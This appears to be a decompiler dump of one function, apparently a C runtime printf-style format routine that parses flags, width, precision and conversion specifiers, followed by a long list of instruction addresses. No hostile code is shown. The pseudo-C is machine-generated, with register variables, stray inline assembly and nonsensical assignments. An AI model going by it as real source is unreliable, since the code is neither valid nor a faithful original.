                                                                                                                                                  			E67709650(void* __ebx, signed int __ecx, signed int __edx, long long __rbx, long long __rcx, signed int* __rdx, void* __r8, signed int* __r9, signed long long __r10, signed int __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t231;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				signed int _t241;
				signed int _t246;
				void* _t250;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t260;
				signed int _t262;
				signed int _t264;
				void* _t268;
				signed int _t270;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t297;
				intOrPtr _t298;
				signed long long _t303;
				signed long long _t304;
				intOrPtr _t305;
				long long* _t308;
				short* _t313;
				signed int _t319;
				signed int* _t320;
				signed int _t321;
				intOrPtr _t326;
				signed long long _t328;
				signed int _t344;
				signed int _t345;
				signed int* _t355;
				signed int* _t356;
				signed int* _t360;
				signed int _t367;
				signed long long _t368;
				signed long long _t370;
				signed int _t375;
				void* _t377;
				void* _t379;
				signed long long _t380;
				signed int _t388;
				void* _t392;
				signed long long _t399;
				signed int _t400;
				void* _t401;
				signed int* _t408;

				_t400 = __r11;
				_t399 = __r10;
				_t276 = __edx;
				_t269 = __ecx;
				_t268 = __ebx;
				 *((long long*)(_t379 + 0x18)) = __rbx;
				_push(_t370);
				_push(_t401);
				_t377 = _t379 - 0x1d0;
				_t380 = _t379 - 0x2d0;
				_t303 =  *0x67716000; // 0x9b7b11e8241
				_t304 = _t303 ^ _t380;
				 *(_t377 + 0x1c8) = _t304;
				 *((long long*)(_t380 + 0x70)) = __rcx;
				 *(_t380 + 0x68) = __rdx;
				_t408 = __r9;
				 *((intOrPtr*)(_t380 + 0x64)) = 0;
				r13d = 0;
				 *(_t380 + 0x58) = 0;
				 *(_t380 + 0x44) = 0;
				 *(_t380 + 0x4c) = 0;
				 *(_t380 + 0x5c) = 0;
				 *(_t380 + 0x54) = 0;
				E67707498(_t304, _t377 - 0x80, __r8);
				r10d = 0;
				if(__rcx != 0) {
					r14d = r14d | 0xffffffff;
					__eflags =  *(__rcx + 0x18) & 0x00000040;
					_t392 = 0x67700000;
					if(( *(__rcx + 0x18) & 0x00000040) != 0) {
						L19:
						_t355 =  *(_t380 + 0x68);
						__eflags = _t355;
						if(_t355 == 0) {
							L14:
							E6770851C(_t304);
							 *_t304 = 0x16;
							E67709254();
							r11d = 0;
							__eflags =  *((intOrPtr*)(_t377 - 0x68)) - r11b;
							L15:
							if(__eflags != 0) {
								_t305 =  *((intOrPtr*)(_t377 - 0x70));
								_t37 = _t305 + 0xc8;
								 *_t37 =  *(_t305 + 0xc8) & 0xfffffffd;
								__eflags =  *_t37;
							}
							goto L186;
						}
						r12b =  *_t355;
						_t295 = r10d;
						 *(_t380 + 0x40) = r10d;
						 *(_t380 + 0x48) = r10d;
						r8d = r10d;
						 *(_t377 - 0x60) = _t399;
						__eflags = r12b;
						if(r12b == 0) {
							L183:
							__eflags =  *((intOrPtr*)(_t377 - 0x68)) - r10b;
							if( *((intOrPtr*)(_t377 - 0x68)) != r10b) {
								_t326 =  *((intOrPtr*)(_t377 - 0x70));
								_t183 = _t326 + 0xc8;
								 *_t183 =  *(_t326 + 0xc8) & 0xfffffffd;
								__eflags =  *_t183;
							}
							goto L186;
						} else {
							_t319 =  *((intOrPtr*)(_t377 - 0x50));
							r11d = 0x200;
							while(1) {
								_t356 =  &(_t355[0]);
								 *(_t380 + 0x68) = _t356;
								__eflags = _t295;
								if(_t295 < 0) {
									break;
								} else {
									__eflags = _t401 - 0x20 - 0x58;
									if(_t401 - 0x20 > 0x58) {
										_t269 = r10d;
									} else {
										_t269 =  *(r12b + _t392 + 0x12000) & 0xf;
									}
								}
								_t304 = r8d;
								_t328 = _t269 + _t269 * 8 + _t304;
								r8d =  *(_t328 + _t392 + 0x12020) & 0x000000ff;
								r8d = r8d >> 4;
								 *(_t380 + 0x60) = r8d;
								__eflags = r8d - 8;
								if(r8d == 8) {
									goto L14;
								}
								_t270 = r8d;
								__eflags = r8d;
								if(r8d == 0) {
									L209:
									 *(_t380 + 0x54) = r10d;
									_t231 = E6770B1A8(r12b & 0xffffffff, _t304, _t400);
									__eflags = _t231;
									if(_t231 == 0) {
										L211:
										_t269 = r12b;
										E6770950C(_t231, r12b,  *((intOrPtr*)(_t380 + 0x70)), _t380 + 0x40);
										_t295 =  *(_t380 + 0x40);
										r10d = 0;
										L179:
										_t355 =  *(_t380 + 0x68);
										r8d =  *(_t380 + 0x60);
										r11d = 0x200;
										_t392 = 0x67700000;
										L180:
										r12b =  *_t355;
										__eflags = r12b;
										if(r12b != 0) {
											continue;
										}
										break;
									}
									_t269 = r12b;
									_t231 = E6770950C(_t231, r12b,  *((intOrPtr*)(_t380 + 0x70)), _t380 + 0x40);
									_t360 =  *(_t380 + 0x68);
									r12b =  *_t360;
									 *(_t380 + 0x68) =  &(_t360[0]);
									__eflags = r12b;
									if(r12b == 0) {
										E6770851C(_t304);
										 *_t304 = 0x16;
										E67709254();
										__eflags =  *((intOrPtr*)(_t377 - 0x68)) - sil;
										goto L15;
									}
									goto L211;
								}
								_t269 = _t270 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									 *(_t380 + 0x78) = r10d;
									 *(_t380 + 0x5c) = r10d;
									 *(_t380 + 0x58) = r10d;
									 *(_t380 + 0x4c) = r10d;
									r13d = r10d;
									 *(_t380 + 0x44) = r14d;
									 *(_t380 + 0x54) = r10d;
									goto L180;
								}
								_t269 = _t269 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									__eflags = r12b - 0x20;
									if(r12b == 0x20) {
										r13d = r13d | 0x00000002;
									} else {
										__eflags = r12b - 0x23;
										if(r12b == 0x23) {
											asm("inc ecx");
										} else {
											__eflags = r12b - 0x2b;
											if(r12b == 0x2b) {
												r13d = r13d | 0x00000001;
											} else {
												__eflags = r12b - 0x2d;
												if(r12b == 0x2d) {
													r13d = r13d | 0x00000004;
												} else {
													__eflags = r12b - 0x30;
													if(r12b == 0x30) {
														r13d = r13d | 0x00000008;
													}
												}
											}
										}
									}
									goto L180;
								}
								_t269 = _t269 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									__eflags = r12b - 0x2a;
									if(r12b != 0x2a) {
										_t269 = _t304 + _t304 * 4;
										_t237 = _t304 + _t328 * 2 - 0x30;
										L221:
										 *(_t380 + 0x58) = _t237;
										goto L180;
									}
									_t238 =  *_t408;
									_t408 =  &(_t408[2]);
									 *(_t380 + 0x58) = _t238;
									__eflags = _t238;
									if(_t238 >= 0) {
										goto L180;
									}
									r13d = r13d | 0x00000004;
									_t237 =  ~_t238;
									goto L221;
								}
								_t269 = _t269 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									 *(_t380 + 0x44) = r10d;
									goto L180;
								}
								_t269 = _t269 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									__eflags = r12b - 0x2a;
									if(r12b != 0x2a) {
										_t269 = _t370 + _t370 * 4;
										 *(_t380 + 0x44) = _t304 + _t328 * 2 - 0x30;
									} else {
										_t286 =  *_t408;
										_t408 =  &(_t408[2]);
										 *(_t380 + 0x44) = _t286;
										__eflags = _t286;
										if(_t286 < 0) {
											_t286 = r14d;
											 *(_t380 + 0x44) = r14d;
										}
									}
									goto L180;
								}
								_t269 = _t269 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									__eflags = r12b - 0x49;
									if(r12b == 0x49) {
										_t240 =  *_t356;
										asm("inc ecx");
										__eflags = _t240 - 0x36;
										if(_t240 != 0x36) {
											L199:
											__eflags = _t240 - 0x33;
											if(_t240 != 0x33) {
												L202:
												__eflags = _t240 - 0x64;
												if(_t240 == 0x64) {
													goto L180;
												}
												__eflags = _t240 - 0x69;
												if(_t240 == 0x69) {
													goto L180;
												}
												__eflags = _t240 - 0x6f;
												if(_t240 == 0x6f) {
													goto L180;
												}
												__eflags = _t240 - 0x75;
												if(_t240 == 0x75) {
													goto L180;
												}
												__eflags = _t240 - 0x78;
												if(_t240 == 0x78) {
													goto L180;
												}
												__eflags = _t240 - 0x58;
												if(_t240 == 0x58) {
													goto L180;
												}
												 *(_t380 + 0x60) = r10d;
												goto L209;
											}
											__eflags = _t356[0] - 0x32;
											if(_t356[0] != 0x32) {
												goto L202;
											}
											_t355 =  &(_t356[0]);
											asm("inc ecx");
											goto L180;
										}
										__eflags = _t356[0] - 0x34;
										if(_t356[0] != 0x34) {
											goto L199;
										}
										_t355 =  &(_t356[0]);
										asm("inc ecx");
										goto L180;
									}
									__eflags = r12b - 0x68;
									if(r12b == 0x68) {
										r13d = r13d | 0x00000020;
									} else {
										__eflags = r12b - 0x6c;
										if(r12b == 0x6c) {
											__eflags =  *_t356 - 0x6c;
											if( *_t356 != 0x6c) {
												r13d = r13d | 0x00000010;
											} else {
												_t355 =  &(_t356[0]);
												asm("inc ecx");
											}
										} else {
											__eflags = r12b - 0x77;
											if(r12b == 0x77) {
												asm("inc ecx");
											}
										}
									}
									goto L180;
								}
								_t269 = _t269 - 1;
								__eflags = _t269;
								if(_t269 != 0) {
									goto L180;
								}
								_t241 = r12b;
								__eflags = _t241 - 0x64;
								if(__eflags > 0) {
									__eflags = _t241 - 0x65;
									if(_t241 < 0x65) {
										L148:
										__eflags =  *(_t380 + 0x5c) - r10d;
										if( *(_t380 + 0x5c) != r10d) {
											L176:
											_t304 =  *(_t377 - 0x60);
											__eflags = _t304;
											if(_t304 != 0) {
												free();
												r10d = 0;
												__eflags = r10d;
												 *(_t377 - 0x60) = _t399;
											}
											_t286 =  *(_t380 + 0x44);
											goto L179;
										}
										__eflags = r13b & 0x00000040;
										if(__eflags == 0) {
											L157:
											_t287 =  *(_t380 + 0x4c);
											L158:
											r12d =  *(_t380 + 0x58);
											_t374 =  *((intOrPtr*)(_t380 + 0x70));
											r12d = r12d -  *(_t380 + 0x48);
											r12d = r12d - _t287;
											__eflags = r13b & 0x0000000c;
											if(__eflags == 0) {
												_t269 = 0x20;
												E67709554(0x20, r12d, _t319, _t374, _t377, _t374, _t380 + 0x40);
											}
											E677095A8(_t287, __eflags, _t319, _t380 + 0x50, _t370, _t374, _t374, _t380 + 0x40);
											__eflags = r13b & 0x00000008;
											if((r13b & 0x00000008) != 0) {
												__eflags = r13b & 0x00000004;
												if((r13b & 0x00000004) == 0) {
													_t388 = _t374;
													_t280 = r12d;
													_t269 = 0x30;
													E67709554(0x30, _t280, _t319, _t374, _t377, _t388, _t380 + 0x40);
												}
											}
											_t288 =  *(_t380 + 0x48);
											__eflags =  *(_t380 + 0x54);
											if(__eflags == 0) {
												L171:
												E677095A8(_t288, __eflags, _t319, _t319, _t370, _t374, _t374, _t380 + 0x40);
												r10d = 0;
												__eflags = r10d;
												goto L172;
											} else {
												__eflags = _t288;
												if(__eflags <= 0) {
													goto L171;
												}
												_t375 = _t319;
												while(1) {
													r9d =  *_t375 & 0x0000ffff;
													r8d = 6;
													_t288 = _t288 - 1;
													_t374 = _t375 + 2;
													_t246 = E6770EB78();
													r10d = 0;
													__eflags = _t246;
													if(_t246 != 0) {
														break;
													}
													_t280 =  *(_t377 - 0x58);
													__eflags = _t280;
													if(__eflags == 0) {
														break;
													}
													_t388 =  *((intOrPtr*)(_t380 + 0x70));
													E677095A8(_t280, __eflags, _t319, _t377 + 0x1c0, _t370, _t374, _t388, _t380 + 0x40);
													r10d = 0;
													__eflags = _t288;
													if(_t288 != 0) {
														continue;
													}
													L172:
													_t295 =  *(_t380 + 0x40);
													L173:
													__eflags = _t295;
													if(_t295 >= 0) {
														__eflags = r13b & 0x00000004;
														if((r13b & 0x00000004) != 0) {
															_t388 =  *((intOrPtr*)(_t380 + 0x70));
															_t280 = r12d;
															_t269 = 0x20;
															E67709554(0x20, _t280, _t319, _t374, _t377, _t388, _t380 + 0x40);
															_t295 =  *(_t380 + 0x40);
															r10d = 0;
															__eflags = r10d;
														}
													}
													goto L176;
												}
												_t295 = r14d;
												 *(_t380 + 0x40) = r14d;
												goto L173;
											}
										}
										asm("inc ecx");
										if(__eflags >= 0) {
											__eflags = r13b & 0x00000001;
											if((r13b & 0x00000001) == 0) {
												__eflags = r13b & 0x00000002;
												if((r13b & 0x00000002) == 0) {
													goto L157;
												}
												 *((char*)(_t380 + 0x50)) = 0x20;
												L154:
												_t287 = 1;
												 *(_t380 + 0x4c) = 1;
												goto L158;
											}
											 *((char*)(_t380 + 0x50)) = 0x2b;
											goto L154;
										}
										 *((char*)(_t380 + 0x50)) = 0x2d;
										goto L154;
									}
									__eflags = _t241 - 0x67;
									if(_t241 <= 0x67) {
										L65:
										r13d = r13d | 0x00000040;
										_t319 = _t377 - 0x40;
										_t297 = r11d;
										__eflags = _t286;
										if(__eflags >= 0) {
											if(__eflags != 0) {
												__eflags = _t286 - r11d;
												_t289 =  >  ? r11d : _t286;
												 *(_t380 + 0x44) = _t289;
												__eflags = _t289 - 0xa3;
												if(_t289 > 0xa3) {
													_t293 = _t289 + 0x15d;
													E6770C0CC(_t319, _t293, _t370, _t374);
													 *(_t377 - 0x60) = _t304;
													__eflags = _t304;
													if(_t304 == 0) {
														 *(_t380 + 0x44) = 0xa3;
													} else {
														_t319 = _t304;
														_t297 = _t293;
													}
												}
											} else {
												__eflags = r12b - 0x67;
												if(r12b == 0x67) {
													 *(_t380 + 0x44) = 1;
												}
											}
										} else {
											 *(_t380 + 0x44) = 6;
										}
										_t308 =  *_t408;
										_t408 =  &(_t408[2]);
										_t374 = _t297;
										 *((long long*)(_t377 - 0x50)) = _t308;
										__imp__DecodePointer();
										r9d = r12b;
										 *((long long*)(_t380 + 0x30)) = _t377 - 0x80;
										_t388 = _t297;
										 *(_t380 + 0x28) =  *(_t380 + 0x78);
										_t269 =  *(_t380 + 0x44);
										 *(_t380 + 0x20) =  *(_t380 + 0x44);
										_t250 =  *_t308();
										_t292 = r13d & 0x00000080;
										__eflags = _t292;
										if(_t292 != 0) {
											_t250 = 0;
											__eflags =  *(_t380 + 0x44);
											if( *(_t380 + 0x44) == 0) {
												__imp__DecodePointer();
												_t250 =  *_t308();
											}
										}
										__eflags = r12b - 0x67;
										if(r12b == 0x67) {
											__eflags = _t292;
											if(_t292 == 0) {
												__imp__DecodePointer();
												_t250 =  *_t308();
											}
										}
										__eflags =  *_t319 - 0x2d;
										if( *_t319 == 0x2d) {
											asm("inc ecx");
											_t319 = _t319 + 1;
											__eflags = _t319;
										}
										_t251 = E6770D5B0(_t250, _t319);
										_t295 =  *(_t380 + 0x40);
										L146:
										r10d = 0;
										__eflags = r10d;
										L147:
										 *(_t380 + 0x48) = _t251;
										goto L148;
									}
									__eflags = _t241 - 0x69;
									if(_t241 == 0x69) {
										L98:
										r13d = r13d | 0x00000040;
										__eflags = r13d;
										L99:
										r9d = 0xa;
										L100:
										_t280 =  *(_t380 + 0x4c);
										L101:
										_t253 = 0x8000;
										__eflags = 0x00008000 & r13d;
										if(__eflags != 0) {
											L103:
											_t388 =  *_t408;
											_t408 =  &(_t408[2]);
											L111:
											__eflags = r13b & 0x00000040;
											if((r13b & 0x00000040) != 0) {
												__eflags = _t388;
												if(_t388 < 0) {
													_t388 =  ~_t388;
													asm("inc ecx");
												}
											}
											__eflags = _t253 & r13d;
											if(__eflags == 0) {
												asm("inc ecx");
												if(__eflags >= 0) {
												}
											}
											__eflags = _t286;
											if(_t286 >= 0) {
												r13d = r13d & 0xfffffff7;
												__eflags = _t286 - r11d;
												_t294 =  >  ? r11d : _t286;
											} else {
												_t294 = 1;
											}
											_t298 =  *((intOrPtr*)(_t380 + 0x64));
											_t320 = _t377 + 0x1bf;
											asm("sbb ecx, ecx");
											_t274 = _t269 & _t280;
											__eflags = _t274;
											 *(_t380 + 0x4c) = _t274;
											while(1) {
												_t269 = _t294;
												_t294 = _t294 - 1;
												__eflags = _t269;
												if(_t269 > 0) {
													goto L123;
												}
												L122:
												__eflags = _t388;
												if(_t388 == 0) {
													_t295 =  *(_t380 + 0x40);
													 *(_t380 + 0x44) = _t294;
													_t255 = _t253 - _t268;
													_t319 =  &(_t320[0]);
													 *(_t380 + 0x48) = _t255;
													__eflags = r11d & r13d;
													if((r11d & r13d) == 0) {
														goto L148;
													}
													__eflags = _t255;
													if(_t255 == 0) {
														L129:
														_t319 = _t319 - 1;
														 *(_t380 + 0x48) =  *(_t380 + 0x48) + 1;
														 *_t319 = 0x30;
														goto L148;
													}
													__eflags =  *_t319 - 0x30;
													if( *_t319 == 0x30) {
														goto L148;
													}
													goto L129;
												}
												L123:
												_t280 = _t253 % r9d;
												_t108 =  &(_t356[0xc]); // 0x30
												_t253 = _t108;
												__eflags = _t253 - 0x39;
												if(_t253 > 0x39) {
													_t253 = _t253 + _t298;
													__eflags = _t253;
												}
												 *_t320 = _t253;
												_t320 = _t320 - 1;
												_t269 = _t294;
												_t294 = _t294 - 1;
												__eflags = _t269;
												if(_t269 > 0) {
													goto L123;
												}
												goto L122;
											}
										}
										asm("inc ecx");
										if(__eflags >= 0) {
											_t408 =  &(_t408[2]);
											__eflags = r13b & 0x00000020;
											if((r13b & 0x00000020) == 0) {
												__eflags = r13b & 0x00000040;
												if((r13b & 0x00000040) == 0) {
													r8d =  *(_t408 - 8);
												} else {
													_t388 =  *(_t408 - 8);
												}
											} else {
												__eflags = r13b & 0x00000040;
												if((r13b & 0x00000040) == 0) {
													r8d =  *(_t408 - 8) & 0x0000ffff;
												} else {
													_t388 =  *(_t408 - 8);
												}
											}
											goto L111;
										}
										goto L103;
									}
									__eflags = _t241 - 0x6e;
									if(_t241 == 0x6e) {
										_t370 =  *_t408;
										_t408 =  &(_t408[2]);
										_t256 = E6770E81C();
										r10d = 0;
										__eflags = _t256;
										if(_t256 == 0) {
											goto L14;
										}
										__eflags = r13b & 0x00000020;
										if((r13b & 0x00000020) == 0) {
											 *_t370 = _t295;
										} else {
											 *_t370 = _t295;
										}
										 *(_t380 + 0x5c) = 1;
										goto L176;
									}
									__eflags = _t241 - 0x6f;
									if(_t241 == 0x6f) {
										r9d = 8;
										__eflags = r13b;
										if(r13b < 0) {
											r13d = r13d | r11d;
										}
										goto L100;
									}
									__eflags = _t241 - 0x70;
									if(_t241 == 0x70) {
										_t286 = 0x10;
										asm("inc ecx");
										L88:
										_t257 = 7;
										L89:
										 *((intOrPtr*)(_t380 + 0x64)) = _t257;
										r9d = 0x10;
										__eflags = r13b;
										if(r13b >= 0) {
											goto L100;
										}
										 *((char*)(_t380 + 0x50)) = 0x30;
										_t280 = _t392 - 0xe;
										 *((char*)(_t380 + 0x51)) = _t257 + 0x51;
										goto L101;
									}
									__eflags = _t241 - 0x73;
									if(_t241 == 0x73) {
										L55:
										_t321 =  *_t408;
										__eflags = _t286 - r14d;
										_t260 =  ==  ? 0x7fffffff : _t286;
										_t408 =  &(_t408[2]);
										__eflags = r13d & 0x00000810;
										if((r13d & 0x00000810) == 0) {
											__eflags = _t321;
											_t319 =  ==  ?  *0x67716190 : _t321;
											_t344 = _t319;
											while(1) {
												__eflags = _t260;
												if(_t260 == 0) {
													break;
												}
												_t260 = _t260 - 1;
												__eflags =  *_t344 - r10b;
												if( *_t344 == r10b) {
													break;
												}
												_t344 = _t344 + 1;
												__eflags = _t344;
											}
											_t269 = 0x7fffffff - _t268;
											__eflags = _t269;
											goto L86;
										} else {
											__eflags = _t321;
											 *(_t380 + 0x54) = 1;
											_t319 =  ==  ?  *0x67716198 : _t321;
											_t345 = _t319;
											while(1) {
												__eflags = _t260;
												if(_t260 == 0) {
													break;
												}
												_t260 = _t260 - 1;
												__eflags =  *_t345 - r10w;
												if( *_t345 == r10w) {
													break;
												} else {
													_t345 = _t345 + 2;
													__eflags = _t345;
													continue;
												}
											}
											L86:
											 *(_t380 + 0x48) = _t269;
											goto L148;
										}
									}
									__eflags = _t241 - 0x75;
									if(_t241 == 0x75) {
										goto L99;
									}
									__eflags = _t241 - 0x78;
									if(_t241 != 0x78) {
										goto L148;
									} else {
										_t257 = 0x27;
										goto L89;
									}
								}
								if(__eflags == 0) {
									goto L98;
								}
								__eflags = _t241 - 0x41;
								if(_t241 == 0x41) {
									L64:
									 *(_t380 + 0x78) = 1;
									r12b = r12b + 0x20;
									__eflags = r12b;
									goto L65;
								}
								__eflags = _t241 - 0x43;
								if(_t241 == 0x43) {
									__eflags = r13d & 0x00000830;
									if((r13d & 0x00000830) == 0) {
										asm("inc ecx");
									}
									L59:
									_t408 =  &(_t408[2]);
									__eflags = r13d & 0x00000810;
									if((r13d & 0x00000810) == 0) {
										 *(_t380 + 0x48) = 1;
										 *((char*)(_t377 - 0x40)) =  *(_t408 - 8);
									} else {
										r9d =  *(_t408 - 8) & 0x0000ffff;
										_t388 = _t400;
										_t262 = E6770EB78();
										r10d = 0;
										__eflags = _t262;
										if(_t262 != 0) {
											 *(_t380 + 0x5c) = 1;
										}
									}
									_t319 = _t377 - 0x40;
									goto L148;
								}
								__eflags = _t241 - 0x45;
								if(_t241 == 0x45) {
									goto L64;
								}
								__eflags = _t241 - 0x47;
								if(_t241 == 0x47) {
									goto L64;
								}
								__eflags = _t241 - 0x53;
								if(_t241 == 0x53) {
									__eflags = r13d & 0x00000830;
									if((r13d & 0x00000830) == 0) {
										asm("inc ecx");
									}
									goto L55;
								}
								__eflags = _t241 - 0x58;
								if(_t241 == 0x58) {
									goto L88;
								}
								__eflags = _t241 - 0x5a;
								if(_t241 == 0x5a) {
									_t313 =  *_t408;
									_t408 =  &(_t408[2]);
									__eflags = _t313;
									if(_t313 == 0) {
										L52:
										_t319 =  *0x67716190; // 0x67711fb8
										_t251 = E6770D5B0(_t241, _t319);
										goto L146;
									}
									_t319 =  *((intOrPtr*)(_t313 + 8));
									__eflags = _t319;
									if(__eflags == 0) {
										goto L52;
									} else {
										_t251 =  *_t313;
										asm("inc ecx");
										if(__eflags >= 0) {
											 *(_t380 + 0x54) = r10d;
										} else {
											asm("cdq");
											 *(_t380 + 0x54) = 1;
											_t251 = _t251 - _t280 >> 1;
										}
										goto L147;
									}
								}
								__eflags = _t241 - 0x61;
								if(_t241 == 0x61) {
									goto L65;
								}
								__eflags = _t241 - 0x63;
								if(_t241 == 0x63) {
									goto L59;
								} else {
									goto L148;
								}
							}
							__eflags = r8d;
							if(r8d == 0) {
								goto L183;
							}
							__eflags = r8d - 7;
							if(r8d != 7) {
								goto L14;
							}
							goto L183;
						}
					}
					_t264 = E6770E5F4(__edx, _t304, __rcx);
					_t367 = 0x67716b10;
					__eflags = _t264 - r14d;
					if(_t264 == r14d) {
						L8:
						_t388 = _t367;
						_t392 = 0x67700000;
						L9:
						__eflags =  *(_t388 + 0x38) & 0x0000007f;
						if(( *(_t388 + 0x38) & 0x0000007f) == 0) {
							__eflags = _t264 - r14d;
							if(_t264 != r14d) {
								__eflags = _t264 - 0xfffffffe;
								if(_t264 != 0xfffffffe) {
									_t368 = _t264;
									_t280 = _t276 & 0x0000001f;
									_t304 = _t368 >> 5;
									_t367 = _t368 * 0x58 +  *((intOrPtr*)(_t392 + 0x19900 + _t304 * 8));
									__eflags = _t367;
								}
							}
							__eflags =  *(_t367 + 0x38) & 0x00000080;
							if(( *(_t367 + 0x38) & 0x00000080) == 0) {
								r10d = 0;
								__eflags = r10d;
								goto L19;
							}
						}
						goto L14;
					}
					__eflags = _t264 - 0xfffffffe;
					if(_t264 == 0xfffffffe) {
						goto L8;
					} else {
						_t392 = 0x67700000;
						r8d = r8d & 0x0000001f;
						_t388 = _t264 * 0x58 +  *((intOrPtr*)(0x67700000 + 0x19900 + (_t264 >> 5) * 8));
						goto L9;
					}
				} else {
					E6770851C(_t304);
					 *_t304 = 0x16;
					E67709254();
					r11d = 0;
					if( *((intOrPtr*)(_t377 - 0x68)) != r11b) {
						 *( *((intOrPtr*)(_t377 - 0x70)) + 0xc8) =  *( *((intOrPtr*)(_t377 - 0x70)) + 0xc8) & 0xfffffffd;
					}
					L186:
					return E67706F80(_t269,  *(_t377 + 0x1c8) ^ _t380);
				}
			}
































































                                                                                                                                                  0x67709650
                                                                                                                                                  0x67709650
                                                                                                                                                  0x67709650
                                                                                                                                                  0x67709650
                                                                                                                                                  0x67709650
                                                                                                                                                  0x67709650
                                                                                                                                                  0x67709657
                                                                                                                                                  0x67709658
                                                                                                                                                  0x67709660
                                                                                                                                                  0x67709668
                                                                                                                                                  0x6770966f
                                                                                                                                                  0x67709676
                                                                                                                                                  0x67709679
                                                                                                                                                  0x67709685
                                                                                                                                                  0x6770968a
                                                                                                                                                  0x67709696
                                                                                                                                                  0x67709699
                                                                                                                                                  0x6770969d
                                                                                                                                                  0x677096a0
                                                                                                                                                  0x677096a6
                                                                                                                                                  0x677096aa
                                                                                                                                                  0x677096ae
                                                                                                                                                  0x677096b2
                                                                                                                                                  0x677096b6
                                                                                                                                                  0x677096bb
                                                                                                                                                  0x677096c1
                                                                                                                                                  0x677096ef
                                                                                                                                                  0x677096f3
                                                                                                                                                  0x677096f7
                                                                                                                                                  0x677096fe
                                                                                                                                                  0x677097a9
                                                                                                                                                  0x677097a9
                                                                                                                                                  0x677097ae
                                                                                                                                                  0x677097b1
                                                                                                                                                  0x6770977a
                                                                                                                                                  0x6770977a
                                                                                                                                                  0x6770977f
                                                                                                                                                  0x67709785
                                                                                                                                                  0x6770978a
                                                                                                                                                  0x6770978d
                                                                                                                                                  0x67709791
                                                                                                                                                  0x67709791
                                                                                                                                                  0x67709793
                                                                                                                                                  0x67709797
                                                                                                                                                  0x67709797
                                                                                                                                                  0x67709797
                                                                                                                                                  0x67709797
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770979e
                                                                                                                                                  0x677097b3
                                                                                                                                                  0x677097b6
                                                                                                                                                  0x677097b9
                                                                                                                                                  0x677097be
                                                                                                                                                  0x677097c3
                                                                                                                                                  0x677097c6
                                                                                                                                                  0x677097ca
                                                                                                                                                  0x677097cd
                                                                                                                                                  0x67709e9c
                                                                                                                                                  0x67709e9c
                                                                                                                                                  0x67709ea0
                                                                                                                                                  0x67709ea2
                                                                                                                                                  0x67709ea6
                                                                                                                                                  0x67709ea6
                                                                                                                                                  0x67709ea6
                                                                                                                                                  0x67709ea6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677097d3
                                                                                                                                                  0x677097d3
                                                                                                                                                  0x677097d7
                                                                                                                                                  0x677097dd
                                                                                                                                                  0x677097dd
                                                                                                                                                  0x677097e0
                                                                                                                                                  0x677097e5
                                                                                                                                                  0x677097e7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677097ed
                                                                                                                                                  0x677097f2
                                                                                                                                                  0x677097f4
                                                                                                                                                  0x67709808
                                                                                                                                                  0x677097f6
                                                                                                                                                  0x67709803
                                                                                                                                                  0x67709803
                                                                                                                                                  0x677097f4
                                                                                                                                                  0x67709812
                                                                                                                                                  0x67709815
                                                                                                                                                  0x67709818
                                                                                                                                                  0x67709821
                                                                                                                                                  0x67709825
                                                                                                                                                  0x6770982a
                                                                                                                                                  0x6770982e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709834
                                                                                                                                                  0x67709837
                                                                                                                                                  0x6770983a
                                                                                                                                                  0x67709f88
                                                                                                                                                  0x67709f90
                                                                                                                                                  0x67709f95
                                                                                                                                                  0x67709f9c
                                                                                                                                                  0x67709f9e
                                                                                                                                                  0x67709fcb
                                                                                                                                                  0x67709fd5
                                                                                                                                                  0x67709fd8
                                                                                                                                                  0x67709fdd
                                                                                                                                                  0x67709fe1
                                                                                                                                                  0x67709e6a
                                                                                                                                                  0x67709e6a
                                                                                                                                                  0x67709e6f
                                                                                                                                                  0x67709e74
                                                                                                                                                  0x67709e7a
                                                                                                                                                  0x67709e81
                                                                                                                                                  0x67709e81
                                                                                                                                                  0x67709e84
                                                                                                                                                  0x67709e87
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709e87
                                                                                                                                                  0x67709faa
                                                                                                                                                  0x67709fad
                                                                                                                                                  0x67709fb2
                                                                                                                                                  0x67709fb7
                                                                                                                                                  0x67709fbd
                                                                                                                                                  0x67709fc2
                                                                                                                                                  0x67709fc5
                                                                                                                                                  0x6770a0e2
                                                                                                                                                  0x6770a0e7
                                                                                                                                                  0x6770a0ed
                                                                                                                                                  0x6770a0f2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a0f2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709fc5
                                                                                                                                                  0x67709840
                                                                                                                                                  0x67709840
                                                                                                                                                  0x67709842
                                                                                                                                                  0x6770a0b9
                                                                                                                                                  0x6770a0be
                                                                                                                                                  0x6770a0c3
                                                                                                                                                  0x6770a0c8
                                                                                                                                                  0x6770a0cd
                                                                                                                                                  0x6770a0d3
                                                                                                                                                  0x6770a0d8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a0d8
                                                                                                                                                  0x67709848
                                                                                                                                                  0x67709848
                                                                                                                                                  0x6770984a
                                                                                                                                                  0x6770a069
                                                                                                                                                  0x6770a06d
                                                                                                                                                  0x6770a0b0
                                                                                                                                                  0x6770a06f
                                                                                                                                                  0x6770a06f
                                                                                                                                                  0x6770a073
                                                                                                                                                  0x6770a0a6
                                                                                                                                                  0x6770a075
                                                                                                                                                  0x6770a075
                                                                                                                                                  0x6770a079
                                                                                                                                                  0x6770a09d
                                                                                                                                                  0x6770a07b
                                                                                                                                                  0x6770a07b
                                                                                                                                                  0x6770a07f
                                                                                                                                                  0x6770a094
                                                                                                                                                  0x6770a081
                                                                                                                                                  0x6770a081
                                                                                                                                                  0x6770a085
